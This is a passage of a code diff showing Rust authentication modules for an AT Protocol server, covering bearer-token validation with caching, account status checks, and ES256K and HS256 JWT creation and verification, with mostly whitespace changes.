u.deactivated_at, u.takedown_ref ··· 182 if !allow_deactivated && oauth_token.deactivated_at.is_some() { 183 return Err(TokenValidationError::AccountDeactivated); 184 } 185 if oauth_token.takedown_ref.is_some() { 186 return Err(TokenValidationError::AccountTakedown); 187 } 188 let now = chrono::Utc::now(); 189 if oauth_token.expires_at > now { 190 return Ok(AuthenticatedUser { ··· 195 } 196 } 197 } 198 Err(TokenValidationError::AuthenticationFailed) 199 } 200 pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) { 201 let key_cache_key = format!("auth:key:{}", did); 202 let _ = cache.delete(&key_cache_key).await; 203 } 204 #[derive(Debug, Serialize, Deserialize)] 205 pub struct Claims { 206 pub iss: String, ··· 214 pub lxm: Option<String>, 215 pub jti: String, 216 } 217 #[derive(Debug, Serialize, Deserialize)] 218 pub struct Header { 219 pub alg: String, 220 pub typ: String, 221 } 222 #[derive(Debug, Serialize, Deserialize)] 223 pub struct UnsafeClaims { 224 pub iss: String, 225 pub sub: Option<String>, 226 } 227 - // fancy boy TokenData equivalent for compatibility/structure 228 pub struct TokenData<T> { 229 pub claims: T, 230 }
··· 3 use std::fmt; 4 use std::sync::Arc; 5 use std::time::Duration; 6 + 7 use crate::cache::Cache; 8 + 9 pub mod extractor; 10 pub mod token; 11 pub mod verify; 12 + 13 pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header}; 14 pub use token::{ 15 create_access_token, create_refresh_token, create_service_token, ··· 19 SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, 20 }; 21 pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token}; 22 + 23 const KEY_CACHE_TTL_SECS: u64 = 300; 24 const SESSION_CACHE_TTL_SECS: u64 = 60; 25 + 26 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 27 pub enum TokenValidationError { 28 AccountDeactivated, ··· 30 KeyDecryptionFailed, 31 AuthenticationFailed, 32 } 33 + 34 impl fmt::Display for TokenValidationError { 35 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { 36 match self { ··· 41 } 42 } 43 } 44 + 45 pub struct AuthenticatedUser { 46 pub did: String, 47 pub key_bytes: Option<Vec<u8>>, 48 pub is_oauth: bool, 49 } 50 + 51 pub async fn validate_bearer_token( 52 db: &PgPool, 53 token: &str, 54 ) -> Result<AuthenticatedUser, TokenValidationError> { 55 validate_bearer_token_with_options_internal(db, None, token, false).await 56 } 57 + 58 pub async fn validate_bearer_token_allow_deactivated( 59 db: &PgPool, 60 token: &str, 61 ) -> Result<AuthenticatedUser, TokenValidationError> { 62 validate_bearer_token_with_options_internal(db, None, token, true).await 63 } 64 + 65 pub async fn validate_bearer_token_cached( 66 db: &PgPool, 67 cache: &Arc<dyn Cache>, ··· 69 ) -> Result<AuthenticatedUser, TokenValidationError> { 70 validate_bearer_token_with_options_internal(db, Some(cache), token, false).await 71 } 72 + 73 pub async fn validate_bearer_token_cached_allow_deactivated( 74 db: &PgPool, 75 cache: &Arc<dyn Cache>, ··· 77 ) -> Result<AuthenticatedUser, TokenValidationError> { 78 validate_bearer_token_with_options_internal(db, Some(cache), token, true).await 79 } 80 + 81 async fn validate_bearer_token_with_options_internal( 82 db: &PgPool, 83 cache: Option<&Arc<dyn Cache>>, ··· 85 allow_deactivated: bool, 86 ) -> Result<AuthenticatedUser, TokenValidationError> { 87 let did_from_token = get_did_from_token(token).ok(); 88 + 89 if let Some(ref did) = did_from_token { 90 let key_cache_key = format!("auth:key:{}", did); 91 let mut cached_key: Option<Vec<u8>> = None; 92 + 93 if let Some(c) = cache { 94 cached_key = c.get_bytes(&key_cache_key).await; 95 if cached_key.is_some() { ··· 98 crate::metrics::record_auth_cache_miss("key"); 99 } 100 } 101 + 102 let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key { 103 let user_status = sqlx::query!( 104 "SELECT deactivated_at, takedown_ref FROM users WHERE did = $1", ··· 108 .await 109 .ok() 110 .flatten(); 111 + 112 match user_status { 113 Some(status) => (Some(key), status.deactivated_at, status.takedown_ref), 114 None => (None, None, None), ··· 128 { 129 let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version) 130 .map_err(|_| TokenValidationError::KeyDecryptionFailed)?; 131 + 132 if let Some(c) = cache { 133 let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await; 134 } 135 + 136 (Some(key), user.deactivated_at, user.takedown_ref) 137 } else { 138 (None, None, None) 139 } 140 }; 141 + 142 if let Some(decrypted_key) = decrypted_key { 143 if !allow_deactivated && deactivated_at.is_some() { 144 return Err(TokenValidationError::AccountDeactivated); 145 } 146 + 147 if takedown_ref.is_some() { 148 return Err(TokenValidationError::AccountTakedown); 149 } 150 + 151 if let Ok(token_data) = verify_access_token(token, &decrypted_key) { 152 let jti = &token_data.claims.jti; 153 let session_cache_key = format!("auth:session:{}:{}", did, jti); 154 let mut session_valid = false; 155 + 156 if let Some(c) = cache { 157 if let Some(cached_value) = c.get(&session_cache_key).await { 158 session_valid = cached_value == "1"; ··· 161 crate::metrics::record_auth_cache_miss("session"); 162 } 163 } 164 + 165 if !session_valid { 166 let session_exists = sqlx::query_scalar!( 167 "SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()", ··· 172 .await 173 .ok() 174 .flatten(); 175 + 176 session_valid = session_exists.is_some(); 177 + 178 if session_valid { 179 if let Some(c) = cache { 180 let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await; 181 } 182 } 183 } 184 + 185 if session_valid { 186 return Ok(AuthenticatedUser { 187 did: did.clone(), ··· 192 } 193 } 194 } 195 + 196 if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) { 197 if let Some(oauth_token) = sqlx::query!( 198 r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref ··· 209 if !allow_deactivated && oauth_token.deactivated_at.is_some() { 210 return Err(TokenValidationError::AccountDeactivated); 211 } 212 + 213 if oauth_token.takedown_ref.is_some() { 214 return Err(TokenValidationError::AccountTakedown); 215 } 216 + 217 let now = chrono::Utc::now(); 218 if oauth_token.expires_at > now { 219 return Ok(AuthenticatedUser { ··· 224 } 225 } 226 } 227 + 228 Err(TokenValidationError::AuthenticationFailed) 229 } 230 + 231 pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) { 232 let key_cache_key = format!("auth:key:{}", did); 233 let _ = cache.delete(&key_cache_key).await; 234 } 235 + 236 #[derive(Debug, Serialize, Deserialize)] 237 pub struct Claims { 238 pub iss: String, ··· 246 pub lxm: Option<String>, 247 pub jti: String, 248 } 249 + 250 #[derive(Debug, Serialize, Deserialize)] 251 pub struct Header { 252 pub alg: String, 253 pub typ: String, 254 } 255 + 256 #[derive(Debug, Serialize, Deserialize)] 257 pub struct UnsafeClaims { 258 pub iss: String, 259 pub sub: Option<String>, 260 } 261 + 262 pub struct TokenData<T> { 263 pub claims: T, 264 }
+42
src/auth/token.rs
··· 7 use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 8 use sha2::Sha256; 9 use uuid; 10 type HmacSha256 = Hmac<Sha256>; 11 pub const TOKEN_TYPE_ACCESS: &str = "at+jwt"; 12 pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt"; 13 pub const TOKEN_TYPE_SERVICE: &str = "jwt"; ··· 15 pub const SCOPE_REFRESH: &str = "com.atproto.refresh"; 16 pub const SCOPE_APP_PASS: &str = "com.atproto.appPass"; 17 pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged"; 18 pub struct TokenWithMetadata { 19 pub token: String, 20 pub jti: String, 21 pub expires_at: DateTime<Utc>, 22 } 23 pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> { 24 Ok(create_access_token_with_metadata(did, key_bytes)?.token) 25 } 26 pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> { 27 Ok(create_refresh_token_with_metadata(did, key_bytes)?.token) 28 } 29 pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 30 create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120)) 31 } 32 pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 33 create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90)) 34 } 35 pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> { 36 let signing_key = SigningKey::from_slice(key_bytes)?; 37 let expiration = Utc::now() 38 .checked_add_signed(Duration::seconds(60)) 39 .expect("valid timestamp") 40 .timestamp(); 41 let claims = Claims { 42 iss: did.to_owned(), 43 sub: did.to_owned(), ··· 48 lxm: Some(lxm.to_string()), 49 jti: uuid::Uuid::new_v4().to_string(), 50 }; 51 sign_claims(claims, &signing_key) 52 } 53 fn create_signed_token_with_metadata( 54 did: &str, 55 scope: &str, ··· 58 duration: Duration, 59 ) -> Result<TokenWithMetadata> { 60 let signing_key = SigningKey::from_slice(key_bytes)?; 61 let expires_at = Utc::now() 62 .checked_add_signed(duration) 63 .expect("valid timestamp"); 64 let expiration = expires_at.timestamp(); 65 let jti = uuid::Uuid::new_v4().to_string(); 66 let claims = Claims { 67 iss: did.to_owned(), 68 sub: did.to_owned(), ··· 76 lxm: None, 77 jti: jti.clone(), 78 }; 79 let token = sign_claims_with_type(claims, &signing_key, typ)?; 80 Ok(TokenWithMetadata { 81 token, 82 jti, 83 expires_at, 84 }) 85 } 86 fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> { 87 sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE) 88 } 89 fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> { 90 let header = Header { 91 alg: "ES256K".to_string(), 92 typ: typ.to_string(), 93 }; 94 let header_json = serde_json::to_string(&header)?; 95 let claims_json = serde_json::to_string(&claims)?; 96 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 97 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 98 let message = format!("{}.{}", header_b64, claims_b64); 99 let signature: Signature = key.sign(message.as_bytes()); 100 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 101 Ok(format!("{}.{}", message, signature_b64)) 102 } 103 pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 104 Ok(create_access_token_hs256_with_metadata(did, secret)?.token) 105 } 106 pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 107 Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token) 108 } 109 pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 110 create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120)) 111 } 112 pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 113 create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90)) 114 } 115 pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> { 116 let expiration = Utc::now() 117 .checked_add_signed(Duration::seconds(60)) 118 .expect("valid timestamp") 119 .timestamp(); 120 let claims = Claims { 121 iss: did.to_owned(), 122 sub: did.to_owned(), ··· 127 lxm: Some(lxm.to_string()), 128 jti: uuid::Uuid::new_v4().to_string(), 129 }; 130 sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret) 131 } 132 fn create_hs256_token_with_metadata( 133 did: &str, 134 scope: &str, ··· 139 let expires_at = Utc::now() 140 .checked_add_signed(duration) 141 .expect("valid timestamp"); 142 let expiration = expires_at.timestamp(); 143 let jti = uuid::Uuid::new_v4().to_string(); 144 let claims = Claims { 145 iss: did.to_owned(), 146 sub: did.to_owned(), ··· 154 lxm: None, 155 jti: jti.clone(), 156 }; 157 let token = sign_claims_hs256(claims, typ, secret)?; 158 Ok(TokenWithMetadata { 159 token, 160 jti, 161 expires_at, 162 }) 163 } 164 fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> { 165 let header = Header { 166 alg: "HS256".to_string(), 167 typ: typ.to_string(), 168 }; 169 let header_json = serde_json::to_string(&header)?; 170 let claims_json = serde_json::to_string(&claims)?; 171 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 172 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 173 let message = format!("{}.{}", header_b64, claims_b64); 174 let mut mac = HmacSha256::new_from_slice(secret) 175 .map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?; 176 mac.update(message.as_bytes()); 177 let signature = mac.finalize().into_bytes(); 178 let signature_b64 = URL_SAFE_NO_PAD.encode(signature); 179 Ok(format!("{}.{}", message, signature_b64)) 180 }
··· 7 use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 8 use sha2::Sha256; 9 use uuid; 10 + 11 type HmacSha256 = Hmac<Sha256>; 12 + 13 pub const TOKEN_TYPE_ACCESS: &str = "at+jwt"; 14 pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt"; 15 pub const TOKEN_TYPE_SERVICE: &str = "jwt"; ··· 17 pub const SCOPE_REFRESH: &str = "com.atproto.refresh"; 18 pub const SCOPE_APP_PASS: &str = "com.atproto.appPass"; 19 pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged"; 20 + 21 pub struct TokenWithMetadata { 22 pub token: String, 23 pub jti: String, 24 pub expires_at: DateTime<Utc>, 25 } 26 + 27 pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> { 28 Ok(create_access_token_with_metadata(did, key_bytes)?.token) 29 } 30 + 31 pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> { 32 Ok(create_refresh_token_with_metadata(did, key_bytes)?.token) 33 } 34 + 35 pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 36 create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120)) 37 } 38 + 39 pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 40 create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90)) 41 } 42 + 43 pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> { 44 let signing_key = SigningKey::from_slice(key_bytes)?; 45 + 46 let expiration = Utc::now() 47 .checked_add_signed(Duration::seconds(60)) 48 .expect("valid timestamp") 49 .timestamp(); 50 + 51 let claims = Claims { 52 iss: did.to_owned(), 53 sub: did.to_owned(), ··· 58 lxm: Some(lxm.to_string()), 59 jti: uuid::Uuid::new_v4().to_string(), 60 }; 61 + 62 sign_claims(claims, &signing_key) 63 } 64 + 65 fn create_signed_token_with_metadata( 66 did: &str, 67 scope: &str, ··· 70 duration: Duration, 71 ) -> Result<TokenWithMetadata> { 72 let signing_key = SigningKey::from_slice(key_bytes)?; 73 + 74 let expires_at = Utc::now() 75 .checked_add_signed(duration) 76 .expect("valid timestamp"); 77 + 78 let expiration = expires_at.timestamp(); 79 let jti = uuid::Uuid::new_v4().to_string(); 80 + 81 let claims = Claims { 82 iss: did.to_owned(), 83 sub: did.to_owned(), ··· 91 lxm: None, 92 jti: jti.clone(), 93 }; 94 + 95 let token = sign_claims_with_type(claims, &signing_key, typ)?; 96 + 97 Ok(TokenWithMetadata { 98 token, 99 jti, 100 expires_at, 101 }) 102 } 103 + 104 fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> { 105 sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE) 106 } 107 + 108 fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> { 109 let header = Header { 110 alg: "ES256K".to_string(), 111 typ: typ.to_string(), 112 }; 113 + 114 let header_json = serde_json::to_string(&header)?; 115 let claims_json = serde_json::to_string(&claims)?; 116 + 117 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 118 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 119 + 120 let message = format!("{}.{}", header_b64, claims_b64); 121 let signature: Signature = key.sign(message.as_bytes()); 122 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 123 + 124 Ok(format!("{}.{}", message, signature_b64)) 125 } 126 + 127 pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 128 Ok(create_access_token_hs256_with_metadata(did, secret)?.token) 129 } 130 + 131 pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 132 Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token) 133 } 134 + 135 pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 136 create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120)) 137 } 138 + 139 pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 140 create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90)) 141 } 142 + 143 pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> { 144 let expiration = Utc::now() 145 .checked_add_signed(Duration::seconds(60)) 146 .expect("valid timestamp") 147 .timestamp(); 148 + 149 let claims = Claims { 150 iss: did.to_owned(), 151 sub: did.to_owned(), ··· 156 lxm: Some(lxm.to_string()), 157 jti: uuid::Uuid::new_v4().to_string(), 158 }; 159 + 160 sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret) 161 } 162 + 163 fn create_hs256_token_with_metadata( 164 did: &str, 165 scope: &str, ··· 170 let expires_at = Utc::now() 171 .checked_add_signed(duration) 172 .expect("valid timestamp"); 173 + 174 let expiration = expires_at.timestamp(); 175 let jti = uuid::Uuid::new_v4().to_string(); 176 + 177 let claims = Claims { 178 iss: did.to_owned(), 179 sub: did.to_owned(), ··· 187 lxm: None, 188 jti: jti.clone(), 189 }; 190 + 191 let token = sign_claims_hs256(claims, typ, secret)?; 192 + 193 Ok(TokenWithMetadata { 194 token, 195 jti, 196 expires_at, 197 }) 198 } 199 + 200 fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> { 201 let header = Header { 202 alg: "HS256".to_string(), 203 typ: typ.to_string(), 204 }; 205 + 206 let header_json = serde_json::to_string(&header)?; 207 let claims_json = serde_json::to_string(&claims)?; 208 + 209 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 210 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 211 + 212 let message = format!("{}.{}", header_b64, claims_b64); 213 + 214 let mut mac = HmacSha256::new_from_slice(secret) 215 .map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?; 216 mac.update(message.as_bytes()); 217 + 218 let signature = mac.finalize().into_bytes(); 219 let signature_b64 = URL_SAFE_NO_PAD.encode(signature); 220 + 221 Ok(format!("{}.{}", message, signature_b64)) 222 }
+48
src/auth/verify.rs
··· 8 use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier}; 9 use sha2::Sha256; 10 use subtle::ConstantTimeEq; 11 type HmacSha256 = Hmac<Sha256>; 12 pub fn get_did_from_token(token: &str) -> Result<String, String> { 13 let parts: Vec<&str> = token.split('.').collect(); 14 if parts.len() != 3 { 15 return Err("Invalid token format".to_string()); 16 } 17 let payload_bytes = URL_SAFE_NO_PAD 18 .decode(parts[1]) 19 .map_err(|e| format!("Base64 decode failed: {}", e))?; 20 let claims: UnsafeClaims = 21 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 22 Ok(claims.sub.unwrap_or(claims.iss)) 23 } 24 pub fn get_jti_from_token(token: &str) -> Result<String, String> { 25 let parts: Vec<&str> = token.split('.').collect(); 26 if parts.len() != 3 { 27 return Err("Invalid token format".to_string()); 28 } 29 let payload_bytes = URL_SAFE_NO_PAD 30 .decode(parts[1]) 31 .map_err(|e| format!("Base64 decode failed: {}", e))?; 32 let claims: serde_json::Value = 33 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 34 claims.get("jti") 35 .and_then(|j| j.as_str()) 36 .map(|s| s.to_string()) 37 .ok_or_else(|| "No jti claim in token".to_string()) 38 } 39 pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 40 verify_token_internal(token, key_bytes, None, None) 41 } 42 pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 43 verify_token_internal( 44 token, ··· 47 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 48 ) 49 } 50 pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 51 verify_token_internal( 52 token, ··· 55 Some(&[SCOPE_REFRESH]), 56 ) 57 } 58 pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 59 verify_token_hs256_internal( 60 token, ··· 63 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 64 ) 65 } 66 pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 67 verify_token_hs256_internal( 68 token, ··· 71 Some(&[SCOPE_REFRESH]), 72 ) 73 } 74 fn verify_token_internal( 75 token: &str, 76 key_bytes: &[u8], ··· 81 if parts.len() != 3 { 82 return Err(anyhow!("Invalid token format")); 83 } 84 let header_b64 = parts[0]; 85 let claims_b64 = parts[1]; 86 let signature_b64 = parts[2]; 87 let header_bytes = URL_SAFE_NO_PAD 88 .decode(header_b64) 89 .context("Base64 decode of header failed")?; 90 let header: Header = 91 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 92 if let Some(expected) = expected_typ { 93 if header.typ != expected { 94 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 95 } 96 } 97 let signature_bytes = URL_SAFE_NO_PAD 98 .decode(signature_b64) 99 .context("Base64 decode of signature failed")?; 100 let signature = Signature::from_slice(&signature_bytes) 101 .map_err(|e| anyhow!("Invalid signature format: {}", e))?; 102 let signing_key = SigningKey::from_slice(key_bytes)?; 103 let verifying_key = VerifyingKey::from(&signing_key); 104 let message = format!("{}.{}", header_b64, claims_b64); 105 verifying_key 106 .verify(message.as_bytes(), &signature) 107 .map_err(|e| anyhow!("Signature verification failed: {}", e))?; 108 let claims_bytes = URL_SAFE_NO_PAD 109 .decode(claims_b64) 110 .context("Base64 decode of claims failed")?; 111 let claims: Claims = 112 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 113 let now = Utc::now().timestamp() as usize; 114 if claims.exp < now { 115 return Err(anyhow!("Token expired")); 116 } 117 if let Some(scopes) = allowed_scopes { 118 let token_scope = claims.scope.as_deref().unwrap_or(""); 119 if !scopes.contains(&token_scope) { 120 return Err(anyhow!("Invalid token scope: {}", token_scope)); 121 } 122 } 123 Ok(TokenData { claims }) 124 } 125 fn verify_token_hs256_internal( 126 token: &str, 127 secret: &[u8], ··· 132 if parts.len() != 3 { 133 return Err(anyhow!("Invalid token format")); 134 } 135 let header_b64 = parts[0]; 136 let claims_b64 = parts[1]; 137 let signature_b64 = parts[2]; 138 let header_bytes = URL_SAFE_NO_PAD 139 .decode(header_b64) 140 .context("Base64 decode of header failed")?; 141 let header: Header = 142 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 143 if header.alg != "HS256" { 144 return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg)); 145 } 146 if let Some(expected) = expected_typ { 147 if header.typ != expected { 148 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 149 } 150 } 151 let signature_bytes = URL_SAFE_NO_PAD 152 .decode(signature_b64) 153 .context("Base64 decode of signature failed")?; 154 let message = format!("{}.{}", header_b64, claims_b64); 155 let mut mac = HmacSha256::new_from_slice(secret) 156 .map_err(|e| anyhow!("Invalid secret: {}", e))?; 157 mac.update(message.as_bytes()); 158 let expected_signature = mac.finalize().into_bytes(); 159 let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into(); 160 if !is_valid { 161 return Err(anyhow!("Signature verification failed")); 162 } 163 let claims_bytes = URL_SAFE_NO_PAD 164 .decode(claims_b64) 165 .context("Base64 decode of claims failed")?; 166 let claims: Claims = 167 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 168 let now = Utc::now().timestamp() as usize; 169 if claims.exp < now { 170 return Err(anyhow!("Token expired")); 171 } 172 if let Some(scopes) = allowed_scopes { 173 let token_scope = claims.scope.as_deref().unwrap_or(""); 174 if !scopes.contains(&token_scope) { 175 return Err(anyhow!("Invalid token scope: {}", token_scope)); 176 } 177 } 178 Ok(TokenData { claims }) 179 } 180 pub fn get_algorithm_from_token(token: &str) -> Result<String, String> { 181 let parts: Vec<&str> = token.split('.').collect(); 182 if parts.len() != 3 { 183 return Err("Invalid token format".to_string()); 184 } 185 let header_bytes = URL_SAFE_NO_PAD 186 .decode(parts[0]) 187 .map_err(|e| format!("Base64 decode failed: {}", e))?; 188 let header: Header = 189 serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 190 Ok(header.alg) 191 }
··· 8 use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier}; 9 use sha2::Sha256; 10 use subtle::ConstantTimeEq; 11 + 12 type HmacSha256 = Hmac<Sha256>; 13 + 14 pub fn get_did_from_token(token: &str) -> Result<String, String> { 15 let parts: Vec<&str> = token.split('.').collect(); 16 if parts.len() != 3 { 17 return Err("Invalid token format".to_string()); 18 } 19 + 20 let payload_bytes = URL_SAFE_NO_PAD 21 .decode(parts[1]) 22 .map_err(|e| format!("Base64 decode failed: {}", e))?; 23 + 24 let claims: UnsafeClaims = 25 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 26 + 27 Ok(claims.sub.unwrap_or(claims.iss)) 28 } 29 + 30 pub fn get_jti_from_token(token: &str) -> Result<String, String> { 31 let parts: Vec<&str> = token.split('.').collect(); 32 if parts.len() != 3 { 33 return Err("Invalid token format".to_string()); 34 } 35 + 36 let payload_bytes = URL_SAFE_NO_PAD 37 .decode(parts[1]) 38 .map_err(|e| format!("Base64 decode failed: {}", e))?; 39 + 40 let claims: serde_json::Value = 41 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 42 + 43 claims.get("jti") 44 .and_then(|j| j.as_str()) 45 .map(|s| s.to_string()) 46 .ok_or_else(|| "No jti claim in token".to_string()) 47 } 48 + 49 pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 50 verify_token_internal(token, key_bytes, None, None) 51 } 52 + 53 pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 54 verify_token_internal( 55 token, ··· 58 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 59 ) 60 } 61 + 62 pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 63 verify_token_internal( 64 token, ··· 67 Some(&[SCOPE_REFRESH]), 68 ) 69 } 70 + 71 pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 72 verify_token_hs256_internal( 73 token, ··· 76 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 77 ) 78 } 79 + 80 pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 81 verify_token_hs256_internal( 82 token, ··· 85 Some(&[SCOPE_REFRESH]), 86 ) 87 } 88 + 89 fn verify_token_internal( 90 token: &str, 91 key_bytes: &[u8], ··· 96 if parts.len() != 3 { 97 return Err(anyhow!("Invalid token format")); 98 } 99 + 100 let header_b64 = parts[0]; 101 let claims_b64 = parts[1]; 102 let signature_b64 = parts[2]; 103 + 104 let header_bytes = URL_SAFE_NO_PAD 105 .decode(header_b64) 106 .context("Base64 decode of header failed")?; 107 + 108 let header: Header = 109 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 110 + 111 if let Some(expected) = expected_typ { 112 if header.typ != expected { 113 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 114 } 115 } 116 + 117 let signature_bytes = URL_SAFE_NO_PAD 118 .decode(signature_b64) 119 .context("Base64 decode of signature failed")?; 120 + 121 let signature = Signature::from_slice(&signature_bytes) 122 .map_err(|e| anyhow!("Invalid signature format: {}", e))?; 123 + 124 let signing_key = SigningKey::from_slice(key_bytes)?; 125 let verifying_key = VerifyingKey::from(&signing_key); 126 + 127 let message = format!("{}.{}", header_b64, claims_b64); 128 verifying_key 129 .verify(message.as_bytes(), &signature) 130 .map_err(|e| anyhow!("Signature verification failed: {}", e))?; 131 + 132 let claims_bytes = URL_SAFE_NO_PAD 133 .decode(claims_b64) 134 .context("Base64 decode of claims failed")?; 135 + 136 let claims: Claims = 137 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 138 + 139 let now = Utc::now().timestamp() as usize; 140 if claims.exp < now { 141 return Err(anyhow!("Token 